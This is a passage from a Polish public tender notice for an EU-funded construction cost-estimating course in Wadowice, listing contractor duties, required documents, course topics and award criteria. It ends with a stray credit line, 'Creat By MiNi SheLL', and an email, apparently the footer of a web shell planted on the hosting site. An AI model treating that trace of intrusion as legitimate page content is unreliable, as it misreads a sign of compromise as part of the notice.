(UE EFS), Województwa Małopolskiego, Powiatu Wadowickiego i Modernizacji kształcenia zawodowego w Małopolsce (MKZ) - (wzór logo POKL, UF EFS, województwa i powiatu przekaże zamawiający). W przypadku braku możliwości umieszczenia ww. logotypów na zaświadczeniu, konieczne jest wydanie certyfikatów do każdego zaświadczenia zawierających ww. informacje.
W ramach promocji projektu Wykonawca umieści w miejscu realizacji kursu plakaty związane z projektem, jego nazwę wraz z logotypami.
Wykonawca jest zobowiązany do przeprowadzenia wśród uczestników kursu oceny merytorycznej przebiegu kursu - ewaluacji na podstawie przeprowadzonych ankiet  na początku i na zakończenie kursu. Wyniki oceny merytorycznej przebiegu kursu- ewaluacji Wykonawca przekaże w formie  pisemnej Zamawiającemu po zakończeniu kursu.  
Wykonawca zobowiązany jest do fotograficznego udokumentowania prowadzonego kursu i dostarczenia w/w dokumentacji.
Zgodnie z zasadami finansowania Programu Operacyjnego Kapitał Ludzki wydanymi przez Ministerstwo Rozwoju  Regionalnego, obowiązującymi od 1 stycznia 2011 r. personelem projektu nie mogą być osoby zatrudnione w Instytucjach uczestniczących  w realizacji POKL tj. Instytucji Zarządzającej, Instytucji Pośredniczącej, Instytucji Wdrażającej  (Instytucji Pośredniczącej II stopnia), Regionalnych Ośrodkach EFS, Krajowym Ośrodku EFS, Krajowej Instytucji Wspomagającej, chyba, że nie zachodzi konflikt interesów, ani podwójne finansowanie. Zatem Wykonawca oświadcza, że  od dnia podpisania umowy nie będzie zatrudniony w żadnej z ww. instytucji lub że nie będzie zachodził konflikt interesów pomiędzy zatrudnieniem w tej instytucji i zatrudnieniem przy realizacji niniejszego zamówienia oraz nie będzie miało miejsce podwójne finansowanie związane z jego zatrudnieniem. W przypadku, gdy Wykonawca będzie zatrudniony w jednej z ww. instytucji jest zobowiązany dostarczyć Zamawiającemu dokumenty potwierdzające, że nie zachodzi konflikt interesów pomiędzy zatrudnieniem w tej instytucji  i zatrudnieniem przy realizacji niniejszego zamówienia oraz nie będzie miało miejsce podwójne finansowanie związane  z jego zatrudnieniem. 

Dokumenty jakie winien przedłożyć Wykonawca po zakończeniu kursu:
W związku z realizacją kursu w ramach projektu współfinansowanego przez Europejski Fundusz Społeczny dokumenty winny być opatrzone logo Programu Operacyjnego Kapitał Ludzki (POKL), Unii Europejskiej Europejski Fundusz Społeczny (UE EFS), Województwa Małopolskiego i Powiatu Wadowickiego i Modernizacji kształcenia zawodowego w Małopolsce (MKZ) - (wzór logo POKL, UF EFS, województwa i powiatu przekaże zamawiający).
a/ lista obecności uczestników kursu (z własnoręcznym podpisem ucznia, z każdego dnia zajęć) (oryginał),
b/ dziennik zajęć (kserokopia poświadczona za zgodność z oryginałem),
c/ lista z potwierdzeniem odbioru materiałów szkoleniowych przez uczestników kursu (oryginał),
d/ lista z potwierdzeniem odbioru przez uczestników certyfikatów/zaświadczeń zgodnie ze wzorem MEN (oryginał),
e/ poświadczone za zgodność z oryginałem kserokopie wydanych certyfikatów/zaświadczeń zgodnie ze wzorem MEN o ukończeniu kursu, 
f/ imienny wykaz osób, które ukończyły i które nie ukończyły kursu (oryginał), a przypadku gdy uczestnik nie ukończył kursu oświadczenie wskazujące  powód takiej sytuacji,
g/ lista z potwierdzeniem odbioru przez uczestników kursu cateringu (oryginał), 
h/ wyniki oceny merytorycznej przebiegu kursu-ewaluacja,
i/ dokumentacja fotograficzna z przeprowadzonego kursu.
Dokumentację Wykonawca składa osobiście w Biurze Partnera Projektu w Wadowicach, ul. Batorego 2, 34-100 Wadowice. 
Program szkolenia powinien uwzględniać między innymi takie zagadnienia: pojęcia związane ze sporządzaniem kosztorysów, ich metody i rodzaje, kalkulowanie cen, stawek i narzutów do kosztorysu, tworzenie analiz indywidualnych, określanie kodów CPV, sporządzanie specyfikacji technicznych z branży budowlanych i programów funkcjonalno-użytkowych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com